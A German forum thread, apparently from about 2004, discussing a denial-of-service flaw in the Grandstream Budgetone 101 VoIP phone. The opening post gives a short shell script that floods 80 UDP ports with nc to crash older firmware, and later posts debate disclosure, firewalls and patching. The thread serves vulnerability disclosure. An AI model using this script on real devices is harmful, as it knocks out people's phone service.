Budgetone 101 anfällig für denial of service

dev-null

Neuer User
Mitglied seit
7 Jun 2004
Beiträge
22
Punkte für Reaktionen
0
Punkte
0
Wenn die IP des Telefons für Angreifer erreichbar ist, kann dieser das Telefon sehr einfach zum Absturz bringen. Es sieht so aus, als könnte das Telefon nicht mehr als 80 parallele UDP Verbindungen verwalten.

Exploit:
Code:
#!/bin/sh

target=192.168.10.9;
i=1;

while [ $i -le 80 ];
do

        echo "$i" ;
        echo "$i" | nc -u $target $i;

        i=`expr $i + 1`;

done;
Erfolgreich getestet mit Firmware:
1.0.4.55, 1.0.4.64, 1.0.4.68

Version 1.0.5.0 scheint nicht betroffen zu sein.
 

ganjamen

Mitglied
Mitglied seit
6 Apr 2004
Beiträge
539
Punkte für Reaktionen
0
Punkte
0
das ist vielleicht eine erklärung für die abstürze über die viele user hier klagen.
 

Anonymous

Mitglied
Mitglied seit
20 Feb 2004
Beiträge
701
Punkte für Reaktionen
1
Punkte
0
Tja - man kann ja auch seine Firewall entsprechend konfigurieren, daß sowas nicht passieren kann. Dafür sind Firewalls ja auch da. Aber mit Billig-Routern vom Typ D-link, Mentor, Edimax usw. wird das natürlich schwierig. Übrigens kann man das BT101 auch mit der Firmware 1.0.5.0 von außen zum Absturz bringen.

Aber wir sind hier ja nicht im Forum, um Sabotage zu betreiben, sondern weil wir alle mit möglichst großem Erfolg mit den Geräten arbeiten wollen.

Deshalb halte ich solche Anleitungen, um ein Gerät zum Absturz zu bringen, zumindest für fragwürdig :meinemei:
 

ganjamen

Mitglied
Mitglied seit
6 Apr 2004
Beiträge
539
Punkte für Reaktionen
0
Punkte
0
wenn man ein grandstream gerät als dmz host eingestellt hat und bei der 24h trennung eine IP abbekommt, die ein vorgänger massiv mit filesharing programmen genutzt hat , kommt noch wochenlang traffic mit sinnlosen anfragen rein.
das wird wohl die ursache sein für die abstürze ...

ich finde es gut das der fehler öffentlich gemacht wird, nur wenn alles transparent ist, weiss man als enduser auch was für gefahren bestehen.

ausserdem ist es nicht so unüblich eine fehlerbeschreibung mit dazugehörigem exploit zu veröffentlichen ... sieh buqtraq mailingliste z.b.
 

exim

Admin a.D.
Mitglied seit
27 Apr 2004
Beiträge
1,013
Punkte für Reaktionen
0
Punkte
0
@dev-null: Schicke Dein Shellskript doch mal an den Grandstream-Support. Denn es dürfte auch in deren Interesse sein, diese DoS-Geschichte möglichst bald aus der Welt zu schaffen.

Das wir gerade dabei sind - hat mal jemand einen Portscanner auf einen ATA oder ein BT angesetzt? "GrandStream embedded VoIP phone" ist in der nmap-Datenbank vorhanden. Am SPA mit Firmware 2.0.8 bringt nmap 3.50 einen geöffneten Port (http) und ein "No exact OS matches for host". Der ist wahrscheinlich noch zu neu oder zu unbekannt.
 

Anonymous

Mitglied
Mitglied seit
20 Feb 2004
Beiträge
701
Punkte für Reaktionen
1
Punkte
0
Die Sache war doch bei Grandstream bekannt. Und wie das oben im Eröffnungsposting dieses Threads steht, ist das Problem doch mit der neuen Firmware behoben.

Was man in der ganzen Diskussion hier nicht aus den Augen verlieren sollte: Wir reden hier über einen TELEFONAPPARAT !

Im übrigen ist der "Fehler" hier nicht neu entdeckt, sondern wurde schon im Internet in verschiedensten Diskussionen mehrfach abgehandelt Google doch einfach mal danach. Auch das obige Skript habe ich schonmal irgendo gesehen :wink:

Aber - wie geaagt - der Fehler ist in 1.0.5.0 nicht mehr vorhanden.
 

Clemens

Aktives Mitglied
Mitglied seit
1 Apr 2004
Beiträge
1,496
Punkte für Reaktionen
0
Punkte
36
exim schrieb:
@dev-null:
[..] Das wir gerade dabei sind - hat mal jemand einen Portscanner auf einen ATA oder ein BT angesetzt?[...]
Ein UDP Portscan bringt meinen ATA sofort zum Absturz :(

Wie hebeda schon schreibt - ein Telefon in der DMZ könnte mit den älteren Firmwares schon Probleme bereiten.

Ich finde es sehr gut wenn wir über das Problem schreiben, selbst wenn bei Google was zu finden ist, der Code vielleicht nicht "neu" ist und das Problem mit der neuen FW behoben ist. ;-)

Genau für diese Diskussionen ist unser Forum ja da, also :) weitermachen :)

Clemens
 

dev-null

Neuer User
Mitglied seit
7 Jun 2004
Beiträge
22
Punkte für Reaktionen
0
Punkte
0
Monsterhase65 schrieb:
Was man in der ganzen Diskussion hier nicht aus den Augen verlieren sollte: Wir reden hier über einen TELEFONAPPARAT !
Von dem man natürlich gerade erwartet, dass er zuverlässig funktioniert...

Monsterhase65 schrieb:
Auch das obige Skript habe ich schonmal irgendo gesehen :wink:
Dann sag doch gleich, dass du [email protected] mitliest. :wink:
Oder hast du doch meinen Rechner gehackt? :?
 

Robinson

Aktives Mitglied
Mitglied seit
24 Mrz 2004
Beiträge
1,751
Punkte für Reaktionen
0
Punkte
0
beide Male Monsterhase schrieb:
Übrigens kann man das BT101 auch mit der Firmware 1.0.5.0 von außen zum Absturz bringen.
Aber - wie geaagt - der Fehler ist in 1.0.5.0 nicht mehr vorhanden.
Ich hoffe, die Ursachen für die Abstürze sind nicht identisch (Anzahl Verbindungen).

Ich bin auch der Meinung, dass es hier wenigstens einmal genannt werden MUSS, um bei der Fehlersuche alle Möglichkeiten prüfen zu können. Und da man, wenn man es nicht vermutet, bei Google nicht umbedingt nach diesen Stichwörtern sucht ...

Ist zwar der Grandstream-Thread, aber da wir schon bei dem Thema sind: Ist der SPA2000 sicher in dieser Hinsicht?
 

dev-null

Neuer User
Mitglied seit
7 Jun 2004
Beiträge
22
Punkte für Reaktionen
0
Punkte
0
Robinson schrieb:
beide Male Monsterhase schrieb:
Übrigens kann man das BT101 auch mit der Firmware 1.0.5.0 von außen zum Absturz bringen.
Aber - wie geaagt - der Fehler ist in 1.0.5.0 nicht mehr vorhanden.
Ich hoffe, die Ursachen für die Abstürze sind nicht identisch (Anzahl Verbindungen).
Die 1.0.5.0 scheint 1000 Verbindungen zu können, danach kommt eine Verbindung nicht zustande, und dann gehts weiter. Das Telefon stürzt nicht ab.

Robinson schrieb:
Ich bin auch der Meinung, dass es hier wenigstens einmal genannt werden MUSS, um bei der Fehlersuche alle Möglichkeiten prüfen zu können. Und da man, wenn man es nicht vermutet, bei Google nicht umbedingt nach diesen Stichwörtern sucht ...
Hab gestern kurz gesucht und nichts gefunden. Hat mal wer einen Link?
 

3CX PBX - GRATIS
Linux / Win / Cloud

Neueste Beiträge

Statistik des Forums

Themen
231,866
Beiträge
2,016,122
Mitglieder
348,957
Neuestes Mitglied
hulk1234